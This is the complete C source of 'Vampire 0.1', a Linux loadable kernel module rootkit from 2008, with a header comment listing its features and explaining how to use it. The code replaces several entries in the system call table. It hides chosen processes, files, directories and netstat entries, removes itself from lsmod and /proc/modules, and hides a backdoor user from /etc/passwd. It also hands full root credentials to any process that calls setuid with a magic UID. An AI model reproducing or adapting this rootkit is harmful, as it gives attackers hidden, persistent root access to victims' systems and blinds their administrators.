/*  
 * 4/11/2008 - Prince Lavren <ryan@bitlackeys.com> 
 * Vampire 0.1 - Linux LKM Rootkit -   
 * 
 * Typical Features, which include:
 * 
 * 	- process hiding
 * 	- netstat hiding, will hide as many ports, or services as you want  
 * 	- complete file hiding (getdents, open, chdir)
 * 	- module hides itself from lsmod, and does not show up in /proc/modules if you cat it
 *      - special uid/user can see all hidden services/files/processes
 *      - special uid/user is completely invisible in /etc/passwd 
 *
 *      As you know, the sys_call_table is not exported in the 2.6 kernel. There are several
 *      ways of automating the process of locating the damn thing, but I have found them to be
 *      unreliable. Instead, I have opted to leave that up to the user. If you do not know where
 *      to find the address for exported symbols, then I wouldn't recommend using this software
 *      to begin with.  
 *      
 *      To use this code, you first need to assign u_long sc_address with the sys_call_table address.
 *      Beyond that, just populate the arrays below with the things that you want hidden, and create
 *      a user with a UID matching the #define SPECIAL_UID value, and the username matching SPECIAL_USER
 *      When logged in with this user, you can see all of the elements otherwise hidden by root. 
 *      If you wish to execute a command as root then you must use the vampire client "vc" which is done
 *      by typing ./vc --cmd <uid> <command> 
 *
 *      The README documents the rest of the vampire client
 *       
 *     
 *
 *         
*/ 

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
#include <linux/time.h>
#include <linux/dirent.h>
#include <linux/stat.h>
#include <linux/proc_fs.h>

#include <asm/errno.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>

#define HIDDEN_SERVICE ":sshd" 
#define MODULE_NAME "vampire" /* this needs to be hidden from lsmod */ 
#define SPECIAL_UID 31337
#define SPECIAL_USER "elite"

/* note: leave the last string as "NULL" */
const char *p_array[] =
#define P_COUNT 4		/* number of hidden processes */
{ "vi", "vim", "ps", "abyss", "NULL" };

const char *d_array[] =
#define D_COUNT 3		/* number of hidden directories */
{ "/hidden", "/root/trojan", "/tmp/bleh", "NULL" };

const char *f_array[] =
#define F_COUNT 3		/* number of hidden files */
{ "test1", "test2", "test3", "NULL" };

const char *srv_array[] = 
#define SRV_COUNT 1            /* names of the service, or services you want hidden from netstat */ 
{ ":ssh", "NULL" }; 

static int mod_chk = 0;
static int pass_chk = 0;

MODULE_LICENSE ("lol");
MODULE_AUTHOR ("Ryan O'Neill");

unsigned long **sys_call_table;

/* this address needs to be the same as the sys_call_table symbol in your /boot/System.map file */
unsigned long sc_address = 0xc0488720; 


asmlinkage int (*old_open) (const char *, int, int);
asmlinkage int (*old_write) (int, const void *, size_t);  
asmlinkage int (*old_getdents) (unsigned int, struct dirent *, unsigned int);
asmlinkage int (*old_getdents64) (unsigned int, struct dirent *, unsigned int); 

asmlinkage int (*old_chdir) (const char *);
asmlinkage int (*old_setuid) (uid_t uid); 
asmlinkage int (*old_setuid32) (uid_t uid);

/* my special version of atoi */
int kern_atoi (char *string)
{
    int sign;
    int val = 0;

    sign = (*string == '-') ? -1 : 1;

    while (*string)
    {
           val = 10 * val + (*string - '0');
           string++;
    }

  return sign * val;
}




struct task_struct * get_task(pid_t pid) 
{
     struct task_struct *task;

     for_each_process (task) /* new function to 2.6 */ 
     {
 	   if (task->pid == pid)
      		return task;
     }
  return NULL;

}



char should_hide_task_name (pid_t pid)
{
  struct task_struct *tp = get_task (pid);
  int i = 0;

    if (tp)
    {
        for (i = 0; i < P_COUNT + 1; i++)
        {  
      	      if (!strcmp (tp->comm, p_array[i]))
                  return 1;
        }
    }
  return 0;
}


char should_hide_file_name (char *filename)
{
     int i;

     for (i = 0; i < F_COUNT + 1; i++)
     { 
     	   if (!strcmp (filename, f_array[i]))
		return 1;
     }
  return 0;
}


asmlinkage int
new_open (const char *path, int flags, int mode)
{
  
    int i, c; 
    char *kpath;

    kpath = kmalloc(255, GFP_KERNEL);
    c = copy_from_user(kpath, path, 255);
 
   if (current->uid != SPECIAL_UID) 
   {  
	    if (strstr(path, "modules"))
       		 mod_chk = 1; /* in /proc/modules, must hide module name */   
 	             else 
            if (strstr(path, "passwd"))
	         pass_chk = 1;
                     else 
	    
            for (i = 0; i < F_COUNT + 1; i++)
    	    {  
                 if (strstr(path, f_array[i]))
               	 { 
     			 kfree(kpath);
      			return -ENOENT;
	         }  
            } 
	  
   }         	      
  return old_open (path, flags, mode);
}

asmlinkage int new_write (int fd, const void *buf, size_t bytes)
{
    char *kbuf;
    int i, c;

    kbuf = (char *)kmalloc(1200, GFP_KERNEL);

    c = copy_from_user(kbuf, buf, 1200);
  
    if (current->uid == SPECIAL_UID) 
        goto finish; 

    /* /proc/modules is open(), hide module name */ 
    if (mod_chk == 1) 
    { 
   	 if (strstr(kbuf, MODULE_NAME)) 
    	 { 
		kfree(kbuf);
		mod_chk = 0;
		return bytes;
	 }  else { 
	 		kfree(kbuf);
	        	goto finish;
		 } 	
    }  else

    /* hide desired services from netstat */ 
    if (strcmp(current->comm, "netstat") == 0)
    { 
        for (i = 0; i < SRV_COUNT + 1; i++)
        
                if (strstr(kbuf, srv_array[i]))
		{
	       		kfree(kbuf);
	       		return bytes;
		}  else { 
		       		kfree(kbuf); 
             	       		goto finish;   
                        }    				 
    }  else 
       /* stop someone from seeing our special user in /etc/passwd */ 
    if (pass_chk == 1)
    {
    	 if(strstr(kbuf, SPECIAL_USER))
	 {
	 	kfree(kbuf);
		mod_chk = 0;
		return bytes;
	 }  else {
	 		kfree(kbuf);
			goto finish;
		 }

    }  else 

  
   finish: 
   return old_write(fd, buf, bytes);
} 


/* In the case someone tries to cd to our invisible directory */

asmlinkage int
new_chdir (const char *path)
{
     int ret, errno, i;
     
     ret = old_chdir (path); 
     
if (current->uid != SPECIAL_UID) 
{
     for (i = 0; i < D_COUNT + 1; i++)
     {
           if (strcmp (path, d_array[i]) == 0)
           {
          	  errno = ENOENT;
	          return -errno;
           }
     }
} 

    return ret;
}


/* The rootkit client program 'vc' allows you to execute commands as root */ 
asmlinkage int new_setuid (uid_t uid)
{
     
     if (uid == SPECIAL_UID)
     {
     		current->uid = 0;
		current->euid = 0;
		current->gid = 0;
		current->suid = 0;
                current->sgid = 0;
                current->fsuid = 0;
                current->fsgid = 0;

                return 0;
     }  else

     return old_setuid(uid);
}      
 
 /* setuid uses setuid32 in some systems */ 
asmlinkage int new_setuid32 (uid_t uid)
{
	
 
      if (uid == SPECIAL_UID)
      {
      		 current->uid = 0;
		 current->euid = 0;
		 current->gid = 0;
		 current->suid = 0;
		 current->sgid = 0;
		 current->fsuid = 0;
	 	 current->fsgid = 0;
                 
		 return 0;
      }  else

      return old_setuid32(uid);
} 

        

/* this is an adaption from michael zalewskis function */ 
/* it's kind of buggy, so i'll rewrite it */ 

asmlinkage int new_getdents (unsigned int fd, struct dirent *dirp, unsigned int count)
{
  unsigned int bytes, reclen, b;
  struct dirent *dp, *dpp;
  int c; 
 
 /*  get number of bytes returned by real getdents */
  bytes = old_getdents (fd, dirp, count);

if (current->uid != SPECIAL_UID)
{ 
  if (bytes > 0)
  {
      dp = (struct dirent *) kmalloc (bytes, GFP_KERNEL);
      
      if((c = copy_from_user ( dp, dirp, bytes)) != 0) 
          goto done;

      dpp = dp;
      b = bytes;

      while (b > 0)
      {
           reclen = dpp->d_reclen;
	   b -= reclen;
          
	   if ((should_hide_task_name(kern_atoi(dpp->d_name))) || should_hide_file_name(dpp->d_name)) 
	   {
	              if (b != 0) 
		                /* hide, and coverup record */          
	        	  memcpy (dpp, (char *) dpp + reclen, b);
	                  	else    
	            	  dpp->d_off = 1024; // bytes to next dirent
	                  bytes -= reclen;
	   }
              
	   
	   if (dpp->d_reclen <= 0) 
	   {
	       bytes -= b;
	       b = 0;
           }  

	  if (b != 0)		/* move to the next record */
	     dpp = (struct dirent *) ((char *) dpp + reclen);
      }

      c = copy_to_user (dirp, dp, bytes);
      
      done: 
      kfree (dp);
   } 
} 
  return bytes;

}


/* ls uses getdents64 now */ 
asmlinkage int new_getdents64 (unsigned int fd, struct dirent64 *dirp, unsigned int count)
{
  unsigned int bytes, reclen, b;
  struct dirent64 *dp, *dpp;
  int c;

  bytes = (*old_getdents64) (fd, dirp, count);

 if (current->uid != SPECIAL_UID)
 {

  if (bytes > 0)
  {
  
      if ((dp = (struct dirent64 *) kmalloc (bytes, GFP_KERNEL)) == NULL)
      {  
         printk(KERN_INFO "debug: kmalloc failed..\n"); 
         return bytes;  
      } 
 
      if (c = copy_from_user (dp, dirp, bytes) != 0)
       goto free_d;

      dpp = dp;
      b = bytes;

      while (b > 0)
      {
	  reclen = dpp->d_reclen;
	  b -= reclen;
 
          if ((should_hide_file_name(dpp->d_name))) 
          { 
	          // printk(KERN_INFO "Found file %s to hide\n",dpp->d_name); 
	           if (b != 0) 
                       memmove (dpp, (char *) dpp + reclen, b);
	                        else
		       dpp->d_off = 1024;
          	       bytes -= reclen;
          }

	     if (dpp->d_reclen <= 0)
             {
                 bytes -= b;
                 b = 0;
             }
								 

	  if (b != 0)
	      dpp = (struct dirent64 *) ((char *) dpp + reclen);
      }

      if(c = copy_to_user (dirp, dp, bytes) != 0)
         goto free_d;
    
      free_d: 
      kfree (dp);
  } 
}  
 return bytes;

}
 
 

int
init_hooks (void)
{
  sys_call_table = (unsigned long **) sc_address;

  old_open = (void *) sys_call_table[__NR_open];
  sys_call_table[__NR_open] = (void *) new_open;

  old_write = (void *) sys_call_table[__NR_write];
  sys_call_table[__NR_write] = (void *) new_write; 

  old_chdir = (void *) sys_call_table[__NR_chdir];
  sys_call_table[__NR_chdir] = (void *) new_chdir;

  old_getdents = (void *) sys_call_table[__NR_getdents];
  sys_call_table[__NR_getdents] = (void *) new_getdents;

  old_setuid = (void *) sys_call_table[__NR_setuid];
  sys_call_table[__NR_setuid] = (void *) new_setuid; 

  old_setuid32 = (void *)sys_call_table[__NR_setuid32];
  sys_call_table[__NR_setuid32] = (void *) new_setuid32;

  old_getdents64 = (void *) sys_call_table[__NR_getdents64];
  sys_call_table[__NR_getdents64] = (void *) new_getdents64;

  return 0;
}

void
exit_hooks (void)
{
  sys_call_table[__NR_write] = (void *)old_write; 
  sys_call_table[__NR_open] = (void *) old_open;
  sys_call_table[__NR_chdir] = (void *) old_chdir;
  sys_call_table[__NR_getdents] = (void *) old_getdents;
  sys_call_table[__NR_setuid] = (void *) old_setuid;
  sys_call_table[__NR_setuid32] = (void *) old_setuid32;
  sys_call_table[__NR_getdents64] = (void *) old_getdents64;
}

module_init (init_hooks);
module_exit (exit_hooks);
